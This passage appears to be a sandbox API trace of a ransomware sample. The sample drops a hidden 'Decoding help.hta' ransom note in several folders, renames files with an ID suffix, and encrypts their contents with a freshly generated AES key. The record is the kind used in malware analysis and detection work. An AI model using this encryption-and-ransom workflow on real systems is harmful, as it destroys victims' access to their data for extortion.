lstrcpyW (in: lpString1=0x10978870, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*" [0047.111] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*") returned 69 [0047.111] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\Decoding help.hta" [0047.111] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\decoding help.hta")) returned 0xffffffff [0047.111] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x408 [0047.112] WriteFile (in: hFile=0x408, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x21c8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x21c8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0047.615] CloseHandle (hObject=0x408) returned 1 [0050.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0053.651] lstrcmpiW (lpString1="Decoding help.hta", lpString2="VBE6EXT.OLB") returned -1 [0053.651] lstrlenW (lpString="VBE6EXT.OLB") returned 11 [0053.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*" [0053.651] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\*.*") returned 69 [0053.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\", lpString2="VBE6EXT.OLB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" [0053.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" [0053.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.[ID]g9uZrLhJaygpwRm1[ID]" [0053.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.212] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0058.212] CreateFileMappingA (hFile=0x58c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa18 [0058.213] CryptAcquireContextA (in: phProv=0x21c8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x21c8fcec*=0x3448588) returned 1 [0060.185] CryptGenKey (in: hProv=0x3448588, Algid=0x6610, dwFlags=0x1, phKey=0x21c8fce8 | out: phKey=0x21c8fce8*=0x42cf3d8) returned 1 [0060.185] CryptExportKey (in: hKey=0x42cf3d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x21c8fbe4, pdwDataLen=0x21c8fce4 | out: pbData=0x21c8fbe4*, pdwDataLen=0x21c8fce4*=0x2c) returned 1 [0060.185] MapViewOfFile (hFileMappingObject=0xa18, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa000) returned 0x3f90000 [0063.888] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x21c8fbe4*, pdwDataLen=0x21c8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x21c8fbe4*, pdwDataLen=0x21c8fcf8*=0x100) returned 1 [0063.888] CryptEncrypt (in: hKey=0x42cf3d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f90000, pdwDataLen=0x21c8fce4*=0xa000, dwBufLen=0xa000 | out: pbData=0x3f90000*, pdwDataLen=0x21c8fce4*=0xa000) returned 1 [0064.942] UnmapViewOfFile (lpBaseAddress=0x3f90000) Thread: id = 504 os_tid = 0xc24 [0047.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*", lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22894196, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db9b8 [0047.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.123] FindNextFileW (in: hFindFile=0x5db9b8, lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22894196, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.123] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.123] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.124] FindNextFileW (in: hFindFile=0x5db9b8, lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99bae7b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x9e34029, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x99bae7b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0047.124] lstrcpyW (in: lpString1=0x10980878, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*" [0047.124] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*") returned 73 [0047.124] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\Decoding help.hta" [0047.124] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\decoding help.hta")) returned 0xffffffff [0047.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0047.124] WriteFile (in: hFile=0x668, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x21dcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x21dcfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0047.616] CloseHandle (hObject=0x668) returned 1 [0050.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0053.651] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msinfo32.exe.mui") returned -1 [0053.651] lstrlenW (lpString="msinfo32.exe.mui") returned 16 [0053.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*" [0053.651] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*.*") returned 73 [0053.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\", lpString2="msinfo32.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" [0053.651] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" [0053.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0053.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.652] FindNextFileW (in: hFindFile=0x5db9b8, lpFindFileData=0x21dcfd30 | out: lpFindFileData=0x21dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99bae7b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x9e34029, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x99bae7b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 0 [0053.652] FindClose (in: hFindFile=0x5db9b8 | out: hFindFile=0x5db9b8) returned 1 Thread: id = 505 os_tid = 0xc28 [0047.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*", lpFindFileData=0x21f0fd30 | out: lpFindFileData=0x21f0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db5f8 [0047.174] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.174] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x21f0fd30 | out: lpFindFileData=0x21f0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.174] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.174] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x21f0fd30 | out: lpFindFileData=0x21f0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0047.174] lstrcmpW (lpString1=".", lpString2="Acrobat") returned -1 [0047.174] lstrcmpW (lpString1="..", lpString2="Acrobat") returned -1 [0047.174] lstrcmpiW (lpString1="windows", lpString2="Acrobat") returned 1 [0047.174] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*" [0047.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*") returned 57 [0047.174] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", lpString2="Acrobat" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat" [0047.174] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*.*" [0047.174] GlobalMemoryStatus (in: lpBuffer=0x21f0fd10 | out: lpBuffer=0x21f0fd10) [0047.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f27290, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6fc [0047.221] CloseHandle (hObject=0x6fc) returned 1 [0047.221] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x21f0fd30 | out: lpFindFileData=0x21f0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 1 [0047.221] lstrcmpW (lpString1=".", lpString2="Color") returned -1 [0047.221] lstrcmpW (lpString1="..", lpString2="Color") returned -1 [0047.221] lstrcmpiW (lpString1="windows", lpString2="Color") returned 1 [0047.221] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*" [0047.221] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*.*") returned 57 [0047.221] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", lpString2="Color" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color" [0047.221] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Color\\*.*" [0047.221] GlobalMemoryStatus (in: lpBuffer=0x21f0fd10 | out: lpBuffer=0x21f0fd10) [0047.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5d38660, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6fc [0047.233] CloseHandle (hObject=0x6fc) returned 1 [0047.233] FindNextFileW (in: hFindFile=0x5db5f8, lpFindFileData=0x21f0fd30 | out: lpFindFileData=0x21f0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 0 [0047.233] FindClose (in: hFindFile=0x5db5f8 | out: hFindFile=0x5db5f8) returned 1 Thread: id = 506 os_tid = 0xc2c [0047.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*", lpFindFileData=0x2204fd30 | out: lpFindFileData=0x2204fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e30b0 [0049.324] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.324] FindNextFileW (in: hFindFile=0x5e30b0, lpFindFileData=0x2204fd30 | out: lpFindFileData=0x2204fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.324] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.324] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.324] FindNextFileW (in: hFindFile=0x5e30b0, lpFindFileData=0x2204fd30 | out: lpFindFileData=0x2204fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0049.657] lstrcpyW (in: lpString1=0x10d2ea88, lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0049.657] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned 75 [0049.657] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" [0049.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\decoding help.hta")) returned 0xffffffff [0049.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x604 [0051.680] WriteFile (in: hFile=0x604, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2204fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2204fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.701] CloseHandle (hObject=0x604) returned 1 [0053.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.426] lstrcmpiW (lpString1="Decoding help.hta", lpString2="as80.xsl") returned 1 [0058.426] lstrlenW (lpString="as80.xsl") returned 8 [0058.426] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0058.426] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned 75 [0058.426] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", lpString2="as80.xsl" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" [0058.426] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" [0058.426] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]" [0058.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.427] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft analysis services\\as 